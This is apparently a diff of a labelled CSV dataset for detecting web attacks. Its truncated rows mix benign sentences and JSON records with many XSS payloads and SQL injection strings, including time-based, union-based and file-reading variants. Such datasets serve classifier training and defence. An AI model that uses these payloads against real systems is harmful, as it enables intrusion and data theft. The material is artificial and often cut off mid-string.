walking trail leads.,0,normal,23873 +"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">",1,XSS,807 +<style>:target {color:red;}</style><time id=x styl,1,XSS,4808 +"In the drop-down menu, select ""Backup and Restore ",0,normal,25997 +"1"" ) and 5556 = ( select count ( * ) from all_user",2,SQLi,12263 +"""The Irishman"" is playing in select theaters and p",0,normal,26452 +"{""id"":null,""firstName"":""Isaiah"",""lastName"":""Toh"",""",0,normal,27561 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10429 +"<div id=""98""><div id=d><div style=""font-family:'sa",1,XSS,9158 +I'm considering where to have a picnic with friend,0,normal,23898 +Select with precision.,0,normal,24443 +1'+ ( select 'drvv' where 5622 = 5622 and 3580 = (,2,SQLi,15155 +"<samp onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,4497 +"<kbd onmouseenter=""alert(1)"">test</kbd>",1,XSS,2634 +"1"" ) ) as ydkd where 2455 = 2455 and sleep ( 5 ) -",2,SQLi,14289 +His other works include Select and Choice Observat,0,normal,26096 +To aid in the speedy dispatch of your order please,0,normal,25283 +Select your excel.,0,normal,25010 +"<dir draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,7835 +1'+ ( select immd where 7499 = 7499 union all sele,2,SQLi,20775 +( select 2412 = ( 'qqpjq'|| ( select case 2412 whe,2,SQLi,14272 "<embed src=""javascript:alert(1)"">",1,XSS,146 -Filter the dust.,0,normal,22852 -"<bdo ondblclick=""alert(1)"">test</bdo>",1,XSS,2034 -Select your pledge.,0,normal,24952 -"alert;pg(""XSS"")",1,XSS,1166 -"select * from users where id = 1 or "";["" or 1 = 1 ",2,SQLi,11693 -"<rp onmousemove=""alert(1)"">test</rp>",1,XSS,2051 -"-7271' ) ) ) or make_set ( 9354 = 9354,7185 ) and ",2,SQLi,20145 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10817 -1'|| ( select 'epjf' from dual where 8584 = 8584 a,2,SQLi,12677 -1 where 8966 = 8966,2,SQLi,20820 -<tbody onpointerover=alert(1)>XSS</tbody>,1,XSS,3431 -Select agree.,0,normal,24575 -"Log into your account, select your user name, then",0,normal,25904 -<slot id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,7070 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4362 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10617 -"On the other hand, if local elections are held on ",0,normal,25839 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,18156 --8760 ) where 8277 = 8277 union all select 8277--,2,SQLi,19896 +Insert the video.,0,normal,22854 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2035 +Select your oath.,0,normal,24954 +<svg/onload=%26%23097lert%26lpar;1337)>,1,XSS,1167 +"select * from users where id = 1 union select @<@,",2,SQLi,11695 +"<image onmouseup=""alert(1)"">test</image>",1,XSS,2052 +-8677'|| ( select 'ihpm' from dual where 9571 = 95,2,SQLi,20147 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10819 +1 ) where 9860 = 9860 and 4443 = 4111--,2,SQLi,12679 +"1"" where 3018 = 3018 or 2633 = dbms_pipe.receive_m",2,SQLi,20822 +"<img onpaste=""alert(1)"" contenteditable>test</img>",1,XSS,3433 +Select accept.,0,normal,24577 +Lyft offered discounted rides on Election Day in s,0,normal,25901 +"<link onmousedown=""alert(1)"">test</link>",1,XSS,7072 +<rp id=x tabindex=1 onactivate=alert(1)></rp>,1,XSS,4364 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10619 +"On the Linked Accounts screen, select Facebook and",0,normal,25841 +"1"" ) or sleep ( 5 ) #",2,SQLi,18158 +"1', ( select ( case when ( 9644 = 9644 ) then dbms",2,SQLi,19898 <svg/onload=alert('XSS')>,1,XSS,272 -1 ) or 2633 = dbms_pipe.receive_message ( chr ( 11,2,SQLi,12985 -"<tt oncopy=""alert(1)"" contenteditable>test</tt>",1,XSS,8437 -"-8735' ) ) union all select 3262,3262,3262--",2,SQLi,18417 -"-3279"" union all select 8568,8568,8568,8568--",2,SQLi,12317 -"{""id"":null,""name"":""cup""}",0,normal,27302 -"*/alert(1)"">'onload=""/*<svg/1='",1,XSS,9006 -"{""id"":null,""firstName"":""Bang Joni"",""lastName"":""Jan",0,normal,27166 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3811 -"1"" ) as giqb where 4664 = 4664",2,SQLi,13920 -1%' ) ) ) waitfor delay '0:0:5'--,2,SQLi,15776 -") or (1""=""1",2,SQLi,9997 -"<main onmouseout=""alert(1)"">test</main>",1,XSS,4347 +"-2378"" where 2686 = 2686 or 6872 = 6872--",2,SQLi,12987 +<menu onpointerleave=alert(1)>XSS</menu>,1,XSS,8439 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,18419 +"1%' ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6",2,SQLi,12319 +"{""id"":null,""name"":""rule""}",0,normal,27301 +*{background:url(xx:x //**/\red/*)} /* IE 6-7 Stan,1,XSS,9008 +"{""id"":null,""firstName"":""Yingxin"",""lastName"":""Li"",""",0,normal,27164 +"<bdi draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,3813 +"1%"" ) and 6969 = ( select 6969 from pg_sleep ( 5 )",2,SQLi,13922 +1 ) and 6537 = dbms_pipe.receive_message ( chr ( 7,2,SQLi,15778 +") or (1""=""1""/*",2,SQLi,9999 +<style>:target {color:red;}</style><h1 id=x style=,1,XSS,4349 "`""'><img src=xxx:x \x0Aonerror=javascript:alert(1)",1,XSS,546 -select ( case when ( 1227 = 4014 ) then 1227 else ,2,SQLi,19626 -"They can either take the shot themselves, or selec",0,normal,25315 -<picture id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,8503 -select * from users where id = 1 + $+%\ or 1 = 1 -,2,SQLi,11714 -"1"" ) where 2215 = 2215 and 3754 = ( select upper (",2,SQLi,15230 -<textarea id=ta></textarea><script>ta.appendChild(,1,XSS,9324 -"select sleep ( 5 ) and ( ( ( ""wucy"" like ""wucy",2,SQLi,13738 +"1"" where 4445 = 4445 procedure analyse ( extractva",2,SQLi,19628 +They are used to select one of the reverb effect t,0,normal,25317 +"<blink onbeforecut=""alert(1)"" contenteditable>test",1,XSS,8505 +or sleep ( __TIME__ ) = ',2,SQLi,11716 +1 ) as ilqx where 8547 = 8547,2,SQLi,15232 +"<var onmouseover=""prompt(1)"">On Mouse Over</var>?",1,XSS,9326 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,13740 "{""id"":null,""firstName"":""Taufiq"",""lastName"":""Rahman",0,normal,27508 -"1' ) union all select null,null,null,null,null,nul",2,SQLi,15521 -<tt onfocusout=alert(1) tabindex=1 id=x></tt><inpu,1,XSS,7565 -"1"" and 8514 = ( select count ( * ) from domain.dom",2,SQLi,17305 -1' ) where 2121 = 2121 or 4915 = ( select count ( ,2,SQLi,15318 -"According to the legend, Gordium was founded by Go",0,normal,26411 -select * from users where id = 1. union select ver,2,SQLi,11780 -"<applet onmousemove=""alert(1)"">test</applet>",1,XSS,6641 -Select the perfect dress for the occasion.,0,normal,24079 -"<form onkeypress=""alert(1)"" contenteditable>test</",1,XSS,8231 -1' or 6793 = ( select 6793 from pg_sleep ( 5 ) ) a,2,SQLi,12652 -Where's the school?,0,normal,23511 -1'|| ( select 'mzhj' where 9677 = 9677 union all s,2,SQLi,20663 -"<plaintext onmousedown=""alert(1)"">test</plaintext>",1,XSS,2984 -1' ) where 5214 = 5214,2,SQLi,16515 -"1%"" ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ""%",2,SQLi,13410 -Select the perfect proposal spot.,0,normal,24365 -<pre id=x tabindex=1 ondeactivate=alert(1)></pre><,1,XSS,2668 -Where's the cave?,0,normal,23523 -"1"" and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 11",2,SQLi,19608 -eval(URL.slice(-8))>#alert(1),1,XSS,9375 -Select a shade of lipstick for the evening.,0,normal,24078 -"1"" ) as kfvy where 7305 = 7305 or sleep ( 5 ) --",2,SQLi,21777 +"1 union all select null,null,null--",2,SQLi,15523 +"<object onmouseover=""alert(1)"">test</object>",1,XSS,7567 +"1"" or 2633 = dbms_pipe.receive_message ( chr ( 112",2,SQLi,17307 +-1270'|| ( select 'mgdi' where 6785 = 6785 union a,2,SQLi,15320 +"Adam Schiff, a Democratic member of the Benghazi c",0,normal,26408 +select * from users where id = '1' + @ @1 union se,2,SQLi,11782 +"<base onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,6643 +Select the perfect lens for photography.,0,normal,24081 +"<nav draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,8233 +1 ) where 7026 = 7026,2,SQLi,12654 +Where's the hospital?,0,normal,23513 +end and ( ( ( 4675 = 4675,2,SQLi,20665 +<noscript id=x tabindex=1 onactivate=alert(1)></no,1,XSS,2985 +"1%' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ",2,SQLi,16517 +"1%"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13412 +Select the best theme.,0,normal,24367 +"<head draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,2669 +Where's the dam?,0,normal,23525 +1 where 2301 = 2301,2,SQLi,19610 +"exp/*<XSS STYLE='no\xss:noxss(""*//*"");",1,XSS,9377 +Select the ideal gift for a family member.,0,normal,24080 +"1', ( select ( case when ( 1570 = 1570 ) then ( se",2,SQLi,21779 "`""'><img src=xxx:x onerror\x09=javascript:alert(1)",1,XSS,615 -1' ) ) ) and 8162 = 1687 and ( ( ( 'tdyr' like 'td,2,SQLi,19946 -"1 ) where 4768 = 4768 union all select null,null,n",2,SQLi,17851 -<area onpointermove=alert(1)>XSS</area>,1,XSS,4498 -"1' ) ) and 8148 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,19427 -"SYDNEY, AUSTRALIA ""The Nose,"" Sydney Opera House S",0,normal,25511 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,18804 -"1"" ) ) as wssb where 5772 = 5772",2,SQLi,21470 -"<optgroup onmouseout=""alert(1)"">test</optgroup>",1,XSS,3295 -<img onpointermove=alert(1)>XSS</img>,1,XSS,6738 -"<FRAMESET><FRAME SRC=""javascript:document.vulnerab",1,XSS,1501 -<!--><scRipT src=//14.rs>,1,XSS,9019 -"-3415 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( ",2,SQLi,17906 -"According to the report, there were 12 potential l",0,normal,26410 -1%' ) ) and 2716 = ( select count ( * ) from sysus,2,SQLi,15024 -"union select * from users where login = char(114,1",2,SQLi,11123 -"<main ondblclick=""alert(1)"">test</main>",1,XSS,4233 -Select a wine to pair with the meal.,0,normal,24071 -"<marquee oncopy=""alert(1)"" contenteditable>test</m",1,XSS,8821 -"<summary onkeydown=""alert(1)"" contenteditable>test",1,XSS,4431 -and 1 = 0 ) union all,2,SQLi,12046 -1' ) where 9516 = 9516,2,SQLi,16775 +"-9256"" ) ) union all select 2977,2977,2977,2977,29",2,SQLi,19948 +1' ) ) or ( select * from ( select ( sleep ( 5 ) ),2,SQLi,17853 +<noframes onpointerup=alert(1)>XSS</noframes>,1,XSS,4500 +"1%"" ) and 6240 = ( 'qqpjq'|| ( select case 6240 wh",2,SQLi,19429 +"Sufferers can speak normally in ""select"" situation",0,normal,25513 +-3009'+ ( select 'gqbo' where 6915 = 6915 union al,2,SQLi,18806 +"1"" ( select ( case when ( 5451 = 5451 ) then regex",2,SQLi,21472 +"<script onkeypress=""alert(1)"" contenteditable>test",1,XSS,3297 +<iframe id=x tabindex=1 onactivate=alert(1)></ifra,1,XSS,6740 +"<table BACKGROUND=""javascript:document.vulnerable=",1,XSS,1502 +<!ATTLIST xsl:stylesheet id ID #REQUIRED>]>,1,XSS,9021 +"1"" ) as ubva where 6369 = 6369 and 8514 = ( select",2,SQLi,17908 +"Additionally, if a user doesn't select a parking l",0,normal,26407 +1' ) ) as zqeg where 4729 = 4729 and ( 1098 = 9682,2,SQLi,15026 +"1;(load_file(char(47,101,116,99,47,112,97,115,115,",2,SQLi,11125 +"<rp draggable=""true"" ondragend=""alert(1)"">test</rp",1,XSS,4235 +Select a travel destination to visit.,0,normal,24073 +"<address onkeydown=""alert(1)"" contenteditable>test",1,XSS,8823 +"<area onmousedown=""alert(1)"">test</area>",1,XSS,4433 +select * from users where id = 1 union select 1 $$,2,SQLi,12048 +1'|| ( select 'adni' from dual where 6611 = 6611,2,SQLi,16777 "{""id"":null,""firstName"":""Arthas"",""lastName"":""Lee"",""",0,normal,27429 -Where's the police station?,0,normal,23509 -1'|| ( select 'ucro' where 9912 = 9912 and 8594 = ,2,SQLi,22298 -"-5224' ) where 1962 = 1962 union all select 1962,1",2,SQLi,12183 -<tbody onpointerdown=alert(1)>XSS</tbody>,1,XSS,8593 -<rp id=x tabindex=1 onfocus=alert(1)></rp>,1,XSS,4807 -"For a select few beer geeks, the answer is yes.",0,normal,26181 -Select minimize.,0,normal,24623 -1' where 2673 = 2673,2,SQLi,13850 -Randomly select a winner.,0,normal,24429 -"You use the app to select its position, orientatio",0,normal,25065 -"-9003"" ) ) union all select 9721,9721--",2,SQLi,20378 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11919 -1 where 6518 = 6518,2,SQLi,21772 -Update your wardrobe style.,0,normal,22994 -"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,15897 -<dir onfocusout=alert(1) tabindex=1 id=x></dir><in,1,XSS,5320 +Where's the school?,0,normal,23511 +1' ) where 3331 = 3331 or 5356 = ( select count ( ,2,SQLi,22300 +1'|| ( select 'gboi' where 4191 = 4191 and 8514 = ,2,SQLi,12185 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8595 +"<pre oncut=""alert(1)"" contenteditable>test</pre>",1,XSS,4809 +For graphical representation we select units of le,0,normal,26178 +Select clear.,0,normal,24625 +"1' and row ( 6237,7469 ) > ( select count ( * ) ,c",2,SQLi,13852 +Select your ideal date.,0,normal,24431 +"You simply click ""Select > Subject"" and Photoshop ",0,normal,25067 +-2483' where 1327 = 1327 union all select 1327#,2,SQLi,20380 +"select * from users where id = 1 or 1#""$ union sel",2,SQLi,11921 +"1' ) where 5071 = 5071 union all select null,null,",2,SQLi,21774 +Join us for a meeting.,0,normal,22996 +"-7518"" or elt ( 8413 = 3995,3995 ) and ""cpnf"" = ""c",2,SQLi,15899 +<noscript onblur=alert(1) tabindex=1 id=x></noscri,1,XSS,5322 "{""id"":null,""firstName"":""Šâñ"",""lastName"":""",0,normal,27401 -"<mark draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,7120 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2422 --4032' ) where 5157 = 5157 or 1809 = 2810#,2,SQLi,21989 -<style>@keyframes slidein {}</style><center style=,1,XSS,1751 -(sleep 5),2,SQLi,11345 --6581'|| ( select 'hpjd' where 7608 = 7608 union a,2,SQLi,19093 -"-7813"" ) ) as yvyl where 5172 = 5172 union all sel",2,SQLi,12255 -"{""id"":null,""firstName"":""Tony"",""lastName"":""Wang"",""s",0,normal,27234 +"<q onpaste=""alert(1)"" contenteditable>test</q>",1,XSS,7122 +"<ins oncut=""alert(1)"" contenteditable>test</ins>",1,XSS,2423 +1' ) or sleep ( 5 ) and ( 'kgbm' = 'kgbm,2,SQLi,21991 +"<pre draggable=""true"" ondragend=""alert(1)"">test</p",1,XSS,1752 +(sleep(5)),2,SQLi,11347 +1' ) where 3579 = 3579 ( select ( case when ( 5451,2,SQLi,19095 +select ( case when ( 4111 = 1992 ) then 4111 else ,2,SQLi,12257 +"{""id"":null,""firstName"":""Kia Peng"",""lastName"":""Tan""",0,normal,27232 "<input/onmouseover=""javaSCRIPT&colon;confirm&lpar;",1,XSS,339 -Select the menu.,0,normal,24792 -select * from users where id = '1' union select +\,2,SQLi,11856 -"data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPj",1,XSS,1342 -"{""id"":null,""name"":""heat""}",0,normal,27001 -Select the best theme.,0,normal,24367 -<keygen id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,3641 -1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char,2,SQLi,16714 -"-4317"" ) ) as nxvn where 2566 = 2566 union all sel",2,SQLi,21521 -"<article onmouseleave=""alert(1)"">test</article>",1,XSS,3005 -"<param onkeyup=""alert(1)"" contenteditable>test</pa",1,XSS,6961 -"<spacer onmousemove=""alert(1)"">test</spacer>",1,XSS,4091 -"1%"" ) ) or 4915 = ( select count ( * ) from domain",2,SQLi,16315 --9924 ) ) as zgqa where 2867 = 2867 union all sele,2,SQLi,18707 -Create story.,0,normal,23052 -Where's the database file?,0,normal,23394 -1'|| ( select 'ylek' where 3803 = 3803 and 4241 = ,2,SQLi,20582 -"-7637"" union all select 8498,8498,8498--",2,SQLi,19934 -<button onRedo=javascript:alert(1)>,1,XSS,9651 -"<style>@keyframes x{}</style><dialog style=""animat",1,XSS,8364 -"-9808' in boolean mode ) union all select 2528,252",2,SQLi,20588 -1,0,normal,26685 -"1%"" ) ) and elt ( 4249 = 4249,7259 ) and ( ( ""%"" =",2,SQLi,12419 -Select your dream honeymoon.,0,normal,24355 -"1%"" ) and 5556 = ( select count ( * ) from all_use",2,SQLi,13351 -"Dim sum plates and tea are brought around by cart,",0,normal,26238 -Select the right tool.,0,normal,22570 -"-6527' ) ) union all select 5053,5053,5053,5053--",2,SQLi,18024 -"<div id=""40""><style><img src=""</style><img src=x o",1,XSS,9131 +I'll select chocolate.,0,normal,24794 +"select * from users where id = 1 or "".;"" or 1 = 1 ",2,SQLi,11858 +"!--"" /><script>alert('xss');</script>",1,XSS,1343 +"{""id"":null,""firstName"":""Shuping"",""lastName"":""Lim"",",0,normal,26998 +Select your dream reception venue.,0,normal,24369 +"<isindex draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,3643 +1 ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 11,2,SQLi,16716 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,21523 +<div onpointerup=alert(1)>XSS</div>,1,XSS,3006 +<textarea onpointerover=alert(1)>XSS</textarea>,1,XSS,6963 +<del id=x tabindex=1 onbeforeactivate=alert(1)></d,1,XSS,4093 +"1%"" and 3580 = ( select count ( * ) from domain.do",2,SQLi,16317 +"1"" ) as dgzf where 4834 = 4834",2,SQLi,18709 +Insert memory.,0,normal,23054 +Where's the SQL knowledge?,0,normal,23396 +-2204'|| ( select 'bwae' from dual where 4884 = 48,2,SQLi,20584 +"1 and 8148 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,19936 +<button onReset=javascript:alert(1)>,1,XSS,9653 +<style>:target {color: red;}</style><video id=x st,1,XSS,8366 +"1"" where 7788 = 7788 or 4411 = ( select count ( * ",2,SQLi,20590 +1,0,normal,26682 +"1"" ) ) and extractvalue ( 7982,concat ( 0x5c,0x717",2,SQLi,12421 +Please select a venue.,0,normal,24357 +"1"" ) ) and ( select * from ( select ( sleep ( 5 ) ",2,SQLi,13353 +Do you like to select your seat ahead of time?,0,normal,26235 +Plant a shady tree.,0,normal,22572 +1 ) or 4411 = ( select count ( * ) from sysusers a,2,SQLi,18026 +"<div id=""42""><head><base href=""javascript://""/></h",1,XSS,9133 "<xss draggable=""true"" ondrag=""alert(1)"" style=disp",1,XSS,61 -"<IMG SRC=x ontoggle=""alert(String.fromCharCode(88,",1,XSS,1241 --7444 ) ) ) or 1342 = 9774,2,SQLi,22145 -<script id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,5137 -"<q onmousemove=""alert(1)"">test</q>",1,XSS,2344 -"1"" union all select null,null--",2,SQLi,15049 -"<ruby onmousemove=""alert(1)"">test</ruby>",1,XSS,2121 -"<input type=""image"" dynsrc=""javascript:document.vu",1,XSS,1525 -"<big draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,7618 +"<INPUT TYPE=""BUTTON"" action=""alert('XSS')""/>",1,XSS,1242 +1' ) as mmhe where 2142 = 2142 or 8466 = benchmark,2,SQLi,22147 +<ins onpointerup=alert(1)>XSS</ins>,1,XSS,5139 +"<content draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,2345 +"1"" ( select ( case when ( 4587 = 4587 ) then regex",2,SQLi,15051 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2122 +&<script>document.vulnerable=true;</script>,1,XSS,1526 +"<style>@keyframes x{}</style><u style=""animation-n",1,XSS,7620 "<script src=""data:text/javascript,alert(1)""></scri",1,XSS,154 --3881 ) ) ) union all select 4438--,2,SQLi,14537 +1'+ ( select 'dkxk' where 1241 = 1241 waitfor dela,2,SQLi,14539 "ABC<div style=""x:\xE2\x80\x86expression(javascript",1,XSS,482 -<style>:target {color: red;}</style><label id=x st,1,XSS,6123 --1890' ) ) ) or 8526 = 1389 and ( ( ( 'ecgt' = 'ec,2,SQLi,12653 -Select a painting for your living room.,0,normal,24059 -Where are my keys?,0,normal,23486 -1' or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||ch,2,SQLi,12113 -"-2962' ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,15851 -"<style>@keyframes x{}</style><h1 style=""animation-",1,XSS,1763 -"1%"" ) ) ) or row ( 1045,7562 ) > ( select count ( ",2,SQLi,15827 -"-6951"" union all select 2518,2518,2518,2518,2518,2",2,SQLi,15508 -"<abbr ondblclick=""alert(1)"">test</abbr>",1,XSS,8943 -"<meter oncontextmenu=""alert(1)"">test</meter>",1,XSS,7716 --8538%' or 5903 = ( 'qqpjq'|| ( select case 5903 w,2,SQLi,21793 -Where's the perfect place to do some stargazing?,0,normal,23864 -Merge the company data.,0,normal,22597 -"<style>@keyframes slidein {}</style><h1 style=""ani",1,XSS,4854 -"<style>@keyframes x{}</style><spacer style=""animat",1,XSS,2712 -full,0,normal,23151 -"1"" ) ) union all select null,null,null,null,null,n",2,SQLi,20535 -1'|| ( select 'ussi' where 8958 = 8958,2,SQLi,17718 -"{""id"":null,""name"":""Hitmonchan""}",0,normal,26821 -"""))) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11047 -Select barter.,0,normal,24763 -Save up to 37% off select Best Selling Arthritis G,0,normal,25713 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6820 -Select a workout routine that suits you.,0,normal,24064 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,21800 -1' ) as ohnu where 4097 = 4097 union all select nu,2,SQLi,20235 -Select amuse.,0,normal,24725 -1 ) ) as xcsm where 9231 = 9231,2,SQLi,20509 --2748' ) ) as gazw where 4624 = 4624 union all sel,2,SQLi,13082 -"-3230"" ) ) as kbxc where 5007 = 5007 or 2107 = 881",2,SQLi,21875 -select * from users where id = 1 or \< = 1 union s,2,SQLi,11556 -1%' ) and 3580 = ( select count ( * ) from domain.,2,SQLi,21173 -1' ) as xhmm where 8092 = 8092 union all select nu,2,SQLi,19251 -"1%"" ) ) or 1022 = ( select count ( * ) from all_us",2,SQLi,17771 -"<label onbeforecut=""alert(1)"" contenteditable>test",1,XSS,5942 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3068 -Be sure to select the right gender and age group i,0,normal,26332 -<keygen onpointerdown=alert(1)>XSS</keygen>,1,XSS,3630 -"{""id"":null,""name"":""hurry ought""}",0,normal,26885 -Select a workout plan for the week.,0,normal,24028 -<style>:target {color: red;}</style><kbd id=x styl,1,XSS,3029 -<main onpointerdown=alert(1)>XSS</main>,1,XSS,2970 -select * from users where id = 1 <@. or 1 = 1 -- 1,2,SQLi,11665 -<dt onpointerover=alert(1)>XSS</dt>,1,XSS,8647 -"-3628"" or 1570 = convert ( int, ( select char ( 11",2,SQLi,15157 -or''=',2,SQLi,22521 -"{""id"":null,""firstName"":""Kwee Buay"",""lastName"":""Low",0,normal,26930 -VICE: How do you select student participants [for ,0,normal,25186 -<style>:target {transform: rotate(180deg);}</style,1,XSS,4264 -"-7689' union all select 8739,8739,8739,8739,8739,8",2,SQLi,17030 -"1"" ) where 7919 = 7919 and char ( 111 ) ||char ( 7",2,SQLi,15647 -"<em onmousedown=""alert(1)"">test</em>",1,XSS,7993 -1 rlike sleep ( 5 ) # urxh,2,SQLi,18459 -"-2667 ) union all select 5848,5848,5848,5848--",2,SQLi,16726 -"<form onpaste=""alert(1)"" contenteditable>test</for",1,XSS,8042 -"1%"" ) ) procedure analyse ( extractvalue ( 5840,co",2,SQLi,15989 -"<;TABLE>;<;TD BACKGROUND="";javascript:alert(';XSS'",1,XSS,1623 -1' where 7036 = 7036,2,SQLi,12876 -Where's the lighthouse?,0,normal,23526 -"1%"" ) ) and extractvalue ( 7982,concat ( 0x5c,0x71",2,SQLi,22181 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7185 -Select downgrade.,0,normal,24617 -<head onpointerover=alert(1)>XSS</head>,1,XSS,5476 -Fetch data where necessary.,0,normal,23366 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,16459 -onmouseover=alert(/XSS/),1,XSS,8997 -create user name identified by pass123 temporary t,2,SQLi,11373 -"<ruby onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,8634 -coalesce,0,normal,23194 -"1 where 1842 = 1842 or 8514 = benchmark ( 5000000,",2,SQLi,18436 -"1"" ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,18926 -"1' ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( 'ud",2,SQLi,17686 -"1"" ) ) or 6979 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,22262 -I want to choose a movie for movie night.,0,normal,23753 ->><marquee><h1>XSS</h1></marquee>,1,XSS,1305 -"<head onclick=""alert(1)"">test</head>",1,XSS,8429 -<bdo onfocusout=alert(1) tabindex=1 id=x></bdo><in,1,XSS,4034 -<style>:target {color: red;}</style><noembed id=x ,1,XSS,2600 -"1, ( select ( case when ( 7616 = 7616 ) then 1 els",2,SQLi,12809 -<var onfocusout=alert(1) tabindex=1 id=x></var><in,1,XSS,2574 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3187 -"-9171 ) union all select 6880,6880,6880,6880,6880,",2,SQLi,19153 -"<summary onmouseout=""alert(1)"">test</summary>",1,XSS,4832 --1393' ) ) ) union all select 8280--,2,SQLi,20608 --4586' ) as shdb where 6176 = 6176 union all selec,2,SQLi,16087 -Select buy.,0,normal,24558 -<svg id=x tabindex=1 onactivate=alert(1)></svg>,1,XSS,2107 -"1"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171",2,SQLi,19064 -1 rlike ( select * from ( select ( sleep ( 5 ) ) ),2,SQLi,15518 -if ( 5896 = 4251 ) select 5896 else drop function ,2,SQLi,12881 -1' ) as xwlf where 9424 = 9424,2,SQLi,17772 -"{""id"":null,""firstName"":""Emy"",""lastName"":""Sahprudin",0,normal,27179 -"{""id"":null,""firstName"":""Demi"",""lastName"":""Chew"",""a",0,normal,27015 -"1' ) ) ) union all select null,null,null,null,null",2,SQLi,22371 -"<textarea onkeydown=""alert(1)"" contenteditable>tes",1,XSS,7084 -1' ) ) and 4386 = utl_inaddr.get_host_address ( ch,2,SQLi,13193 -"<script>alert(String.fromCharCode(88,83,83))</scri",1,XSS,1280 -"1"" ) where 1793 = 1793",2,SQLi,13222 +"<svg onpaste=""alert(1)"" contenteditable>test</svg>",1,XSS,6125 +-6388'+ ( select 'jqld' where 8600 = 8600 union al,2,SQLi,12655 +Select the freshest ingredients for the recipe.,0,normal,24061 +Where's the restaurant?,0,normal,23488 +1' in boolean mode ) and 3707 = ( select count ( *,2,SQLi,12115 +"1%"" ) ) or 7427 = dbms_pipe.receive_message ( chr ",2,SQLi,15853 +<article onpointerleave=alert(1)>XSS</article>,1,XSS,1764 +"1%"" ) union all select null#",2,SQLi,15829 +"1 or ( select 9173 from ( select count ( * ) ,conc",2,SQLi,15510 +<table id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,8945 +"<listing onpaste=""alert(1)"" contenteditable>test</",1,XSS,7718 +"-9398' union all select 3998,3998,3998,3998,3998,3",2,SQLi,21795 +I want to select a book for my collection.,0,normal,23866 +Plant some succulents.,0,normal,22599 +<noembed id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,4856 +"<noembed onmouseenter=""alert(1)"">test</noembed>",1,XSS,2713 +database,0,normal,23153 +"1 ) and ( select 9067 from ( select count ( * ) ,c",2,SQLi,20537 +"1"" ) or 7427 = dbms_pipe.receive_message ( chr ( 1",2,SQLi,17720 +"{""id"":null,""name"":""sets""}",0,normal,26818 +""")))) and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11049 +Select haggle.,0,normal,24765 +Save up to 35% off select McCafe K-Cups and Coffee,0,normal,25715 +<iframe id=x onfocus=alert(1)>,1,XSS,6822 +Select the right direction to follow.,0,normal,24066 +"1"" ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,21802 +"1%' ) ) and 3824 = benchmark ( 5000000,md5 ( 0x765",2,SQLi,20237 +Select dazzle.,0,normal,24727 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,20511 +"1"" ) as fkgs where 5948 = 5948 or 8384 = like ( 'a",2,SQLi,13084 +"1"" ) ) or row ( 1045,7562 ) > ( select count ( * )",2,SQLi,21877 +select * from users where id = 1 *\ union select n,2,SQLi,11558 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,21175 +"-5989%"" union all select 3581,3581,3581,3581,3581-",2,SQLi,19253 +"1"" ) as xsgx where 5239 = 5239 union all select nu",2,SQLi,17773 